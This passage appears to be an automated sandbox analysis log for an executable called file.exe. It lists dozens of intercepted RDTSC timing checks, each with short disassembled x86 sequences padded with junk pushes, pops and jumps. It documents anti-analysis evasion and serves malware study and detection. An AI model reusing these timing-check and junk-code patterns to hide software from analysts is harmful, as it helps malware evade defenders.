                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BC28 second address: 70BC2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BE06 second address: 70BE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF53 second address: 70CF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FA430E679E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF5D second address: 70CF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713BA1 second address: 713BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713BA7 second address: 713BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716BAE second address: 716BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B0AF second address: 71B0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ecx 0x0000000c jnl 00007FA43130E31Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B1B5 second address: 71B1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jmp 00007FA430E679F6h 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B1DE second address: 71B1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E7DF second address: 71E7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E7FE second address: 71E804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E804 second address: 71E80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E80D second address: 71E823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FA43130E316h 0x00000010 jbe 00007FA43130E316h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E823 second address: 71E827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E827 second address: 71E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722887 second address: 722899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA430E679E6h 0x0000000a jno 00007FA430E679E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722899 second address: 7228B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FA43130E318h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FA43130E322h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7228B1 second address: 7228C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA430E679E6h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7228C2 second address: 7228C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722BB2 second address: 722BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FA430E679E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722EDE second address: 722F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Fh 0x00000009 popad 0x0000000a jbe 00007FA43130E32Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722F0E second address: 722F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722F2C second address: 722F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E325h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7232EE second address: 723306 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA430E679EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FA430E679E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723459 second address: 72345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72345F second address: 7234AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FA430E679EDh 0x0000000f pop eax 0x00000010 jc 00007FA430E679ECh 0x00000016 jc 00007FA430E679E6h 0x0000001c jmp 00007FA430E679F1h 0x00000021 pushad 0x00000022 jmp 00007FA430E679ECh 0x00000027 jp 00007FA430E679E6h 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7288AC second address: 7288BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7276A0 second address: 7276A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7276A4 second address: 7276AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7276AF second address: 7276B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F24E2 second address: 6F2552 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FA43130E326h 0x00000012 lea eax, dword ptr [ebp+12484244h] 0x00000018 mov dword ptr [ebp+122D1851h], ecx 0x0000001e nop 0x0000001f jmp 00007FA43130E326h 0x00000024 push eax 0x00000025 pushad 0x00000026 jmp 00007FA43130E328h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA43130E31Eh 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F263B second address: 6F2641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2641 second address: 6F2647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2B1A second address: 6F2B20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2B20 second address: 6F2BB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E323h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 6233E3A3h 0x00000010 sub dh, 00000042h 0x00000013 call 00007FA43130E319h 0x00000018 jmp 00007FA43130E31Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FA43130E326h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 pop edx 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d pushad 0x0000002e jmp 00007FA43130E323h 0x00000033 jmp 00007FA43130E31Fh 0x00000038 popad 0x00000039 mov eax, dword ptr [eax] 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA43130E322h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2BB4 second address: 6F2BE1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA430E679E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jnl 00007FA430E679E8h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA430E679F3h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F34CA second address: 6F34F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA43130E316h 0x0000000a popad 0x0000000b jp 00007FA43130E326h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FA43130E316h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F34F7 second address: 6F3513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBCB7 second address: 6DBD02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FA43130E316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FA43130E326h 0x00000012 jmp 00007FA43130E31Eh 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA43130E327h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727987 second address: 7279A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7279A2 second address: 7279DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a je 00007FA43130E316h 0x00000010 jmp 00007FA43130E320h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA43130E322h 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B79 second address: 727BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F3h 0x00000007 jmp 00007FA430E679F7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FA430E679ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727BAF second address: 727BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E7F second address: 727E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E99 second address: 727EA3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA43130E31Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727FD9 second address: 727FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B502 second address: 72B506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B506 second address: 72B521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730CB3 second address: 730CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E320h 0x00000009 jc 00007FA43130E316h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F6FD second address: 72F707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F707 second address: 72F70D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F70D second address: 72F71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007FA430E679E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FAF0 second address: 72FB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA43130E316h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007FA43130E31Fh 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FA43130E316h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FB14 second address: 72FB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA430E679F5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FB2F second address: 72FB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FC5B second address: 72FC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FDE3 second address: 72FDFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FDFD second address: 72FE0D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA430E679F2h 0x00000008 ja 00007FA430E679E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE0D second address: 72FE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA43130E322h 0x0000000b jg 00007FA43130E316h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE2B second address: 72FE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE2F second address: 72FE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE3F second address: 72FE43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE43 second address: 72FE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007FA43130E316h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73014D second address: 730153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734349 second address: 73434D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73434D second address: 73435C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73435C second address: 734362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7391EE second address: 73920A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7394BA second address: 7394BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7394BE second address: 7394DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA430E679EAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7394DD second address: 7394E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738EC6 second address: 738ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738ECA second address: 738EDC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FA43130E316h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738EDC second address: 738EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CA99 second address: 73CA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CA9D second address: 73CAA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CAA1 second address: 73CAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CAAB second address: 73CAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CAAF second address: 73CAC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CAC5 second address: 73CACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CC46 second address: 73CC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CC4E second address: 73CC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FA430E679E6h 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FA430E679E6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CC69 second address: 73CC6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CC6D second address: 73CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA430E679F5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CDC0 second address: 73CDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA43130E326h 0x0000000b ja 00007FA43130E316h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CDE6 second address: 73CE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jng 00007FA430E679E6h 0x00000010 jng 00007FA430E679E6h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CE05 second address: 73CE1A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA43130E316h 0x00000008 jnc 00007FA43130E316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CF9B second address: 73CFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679EDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CFAC second address: 73CFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CFB0 second address: 73CFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA430E679E6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F6FD second address: 73F703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F703 second address: 73F708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745E9C second address: 745EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FA43130E316h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744C01 second address: 744C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B53 second address: 745B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
